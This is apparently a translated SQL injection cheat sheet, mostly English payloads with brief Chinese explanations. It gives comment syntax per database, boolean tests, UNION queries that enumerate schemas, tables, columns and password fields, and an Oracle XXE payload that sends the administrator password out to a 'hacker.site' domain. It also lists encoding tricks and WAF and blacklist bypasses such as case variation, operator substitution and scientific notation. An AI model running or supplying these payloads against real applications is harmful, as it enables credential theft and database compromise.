MySQL#comment-- comment [Note the space after the double dash]/*comment*//*! MYSQL Special SQL */PostgreSQL--comment/*comment*/MSQL--comment/*comment*/Oracle--commentSQLite--comment/*comment*/HQLHQL does not support comments
使用逻辑运算进行确认
确认 SQL 注入漏洞的可靠方法涉及执行 逻辑运算 并观察预期结果。例如,当 GET 参数 ?username=Peter 修改为 ?username=Peter' or '1'='1 时,如果返回相同的内容,则表明存在 SQL 注入漏洞。
page.asp?id=1 or 1=1 -- results in true
page.asp?id=1' or 1=1 -- results in true
page.asp?id=1" or 1=1 -- results in true
page.asp?id=1 and 1=2 -- results in false
#Database names-1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata#Tables of a database-1'UniOnSelect1,2,3,gRoUp_cOncaT(0x7c,table_name,0x7C) fRoM information_schema.tables wHeRe table_schema=[database]#Column names-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]
a' UNION SELECT EXTRACTVALUE(xmltype('<?xmlversion="1.0"encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.hacker.site/"> %remote;]>'),'/l') FROM dual-- -
SQLi payload:
username=TEST&password=TEST&email=TEST'),('otherUsername','otherPassword',(select flag from flag limit 1))-- -
A new user with username=otherUsername, password=otherPassword, email:FLAG will be created
使用十进制或十六进制
使用此技术,您可以仅创建 1 个帐户来提取信息。重要的是要注意,您不需要注释任何内容。
使用 hex2dec 和 substr:
'+(select conv(hex(substr(table_name,1,6)),16,10) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
'+(select hex(replace(replace(replace(replace(replace(replace(table_name,"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+''+(select hex(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'#Full ascii uppercase and lowercase replace:'+(select hex(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%"),"z","&"),"J","'"),"K","`"),"L","("),"M",")"),"N","@"),"O","$$"),"Z","&&")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
#Hex of: -1' union select login,password from users-- a
-1' union select 0x2d312720756e696f6e2073656c656374206c6f67696e2c70617373776f72642066726f6d2075736572732d2d2061 -- a
LIMIT 0,1 -> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
通用绕过
使用关键字的黑名单 - 使用大写/小写绕过
?id=1AND1=1#?id=1AnD1=1#?id=1aNd1=1#
使用关键字的黑名单不区分大小写 - 使用等效运算符绕过
AND -> && -> %26%26
OR -> || -> %7C%7C
= -> LIKE,REGEXP,RLIKE, not < and not >
> X -> not between 0 and X
WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())Then(table_name)END) -> group_concat(if(table_schema=database(),table_name,null))
科学计数法 WAF 绕过
您可以在 gosecure blog 中找到对此技巧的更深入解释。
基本上,您可以以意想不到的方式使用科学计数法来绕过 WAF:
-1' or 1.e(1) or '1'='1
-1' or 1337.1337e1 or '1'='1
' or 1.e('')=
绕过列名限制
首先,请注意,如果原始查询和您想要提取标志的表具有相同数量的列,您可以直接执行:0 UNION SELECT * FROM flag
可以在不使用列名的情况下访问表的第三列,使用如下查询:SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;,因此在sqlinjection中,这看起来像:
# This is an example with 3 columns that will extract the column number 3-1UNIONSELECT0,0,0,F.3FROM (SELECT 1,2,3UNIONSELECT*FROMdemo)F;
或使用 comma bypass:
# In this case, it's extracting the third value from a 4 values table and returning 3 values in the "union select"-1unionselect*from (select 1)a join (select 2)b join (select F.3 from (select * from (select 1)q join (select 2)w join (select 3)e join (select 4)r union select * from flag limit 1 offset 5)F)c